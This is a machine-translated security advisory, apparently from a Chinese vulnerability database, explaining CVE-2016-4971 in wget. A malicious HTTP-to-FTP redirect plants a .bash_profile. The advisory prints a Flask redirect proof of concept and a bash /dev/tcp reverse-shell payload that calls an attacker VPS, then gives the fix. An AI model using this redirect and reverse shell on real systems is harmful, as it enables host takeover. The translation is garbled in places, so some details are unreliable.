Wget Vulnerability CVE-2 0 1 6-4 9 7 1-way analysis-vulnerability warning-the black bar safety net

2016-06-22T00:00:00
ID MYHACK58:62201676202
Type myhack58
Reporter 佚名
Modified 2016-06-22T00:00:00

Description

Vulnerability description Recently, the CVE-2 0 1 6-4 9 7 1 bug was officially disclosed, the vulnerabilities affect all older versions of wget, a hacker can exploit this vulnerability to programmers and operations engineers for fishing, so as to obtain its host authority or implant rootkits. Vulnerability details wget as*nix systems commonly used download tool that supports http, https, ftp and other protocols, when using wget to download the file, if the initial download of the http service to download the resources, if the server will download the resource to redirect to the ftp service, wget will default to trust the http server to redirect the ftp link address and file name, and not to do secondary verification. Which may download malicious phisher a malicious file, resulting in the host being invaded. For example, when we access wget http://attackers-server/safe_file.txt when, if the http server returned the following response headers. HTTP/1.1 3 0 2 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Location: ftp://attackers-server/.bash_profile Content-Length: 2 6 2 Server: Apache While we are in their own directory executing wget request, and the current home directory does not contain. bash_profile, then we will be in your system home directory download to this. bash_profile, the. Malicious phishers can in this bash_profile file in writing any malicious code, and once again, we start a shell when the malicious code will be executed, which leads us to the host being invaded. Specific attack examples demo The current demo on the host wget version is as follows: ! We write a simple http download service, 命名 为 testWget.py

!/ usr/bin/env python

from flask import Flask, redirect app = Flask(name) @app. route("/noharm.txt") def test(): return redirect("ftp://192.168.50.116/.bash_profile") if name == "main": app. run(host="0.0.0.0",port=8 0) At the same time in the 1 9 2. 1 6 8. 5 0. 1 1 6 on the host, open ftp service, and the attack payload (bash-i >& /dev/tcp/74.207. xxx. xxx/9 9 8 0 0>&1) Write the ftp service. bash_profile file, and in your own host vps monitor 9 9 8 0 port. At this point in another IP for 192.168.50.61 host on the Home Directory executing wget http://192.168.50.116/noharm.txt (note that the Home directory does not. bash_history file). To exit the current and enter again shell(trigger. bash_profile file of the malicious code execution). At this point in our vps you can successfully get to the 1 9 2. 1 6 8. 5 0. 6 1 the shell permissions. ! The above attacks instances, just in order to use the examples demonstrate the vulnerability of actual harm, the specific attack scenario due to the actual situation. Repair solutions: Upgrade your wget to GNU wget 1.18 version. References: https://lists.gnu.org/archive/html/bug-wget/2016-06/msg00033.html https://bugzilla.redhat.com/show_bug.cgi?id=1343666 https://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html http://git.savannah.gnu.org/cgit/wget.git/commit/?id=e996e322ffd42aaa051602da182d03178d0f13e1 http://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html